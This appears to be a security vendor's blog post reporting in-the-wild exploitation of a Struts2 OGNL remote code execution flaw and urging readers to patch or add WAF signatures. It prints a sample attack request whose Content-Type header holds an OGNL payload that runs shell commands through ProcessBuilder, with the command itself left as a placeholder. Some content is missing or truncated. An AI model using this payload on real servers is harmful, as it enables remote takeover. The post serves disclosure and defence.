Two days ago Apache has published a fix for the new Remote Code Execution vulnerability in Struts2.

Struts2 RCE attacks in the wild
Struts2 RCE attacks in the wild

This vulnerability allows attacker to execute arbitrary Java code on the application server.

We can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.


Wallarm has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:

GET /valid-struts.action HTTP/1.1
User-Agent: any
Content-Type: %{(#_=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}


Please check that you’ve already updated to Struts 2.3.32 or Struts

If you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It’s essentially similar to the previous OGNL exploits however it’s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:



Here is a list of all historical OGNL security issues in Struts2:

It means that the OGNL technology is broken altogether. Looks like this type of vulnerabilities is a hotspot for the researchers. While developers continue to play with the executable objects (a.k.a serialization), these methods will likely yield new vulnerabilities in the future. We can predict new issues with OGNL and other serialized objects like REST and XML RPC in the future.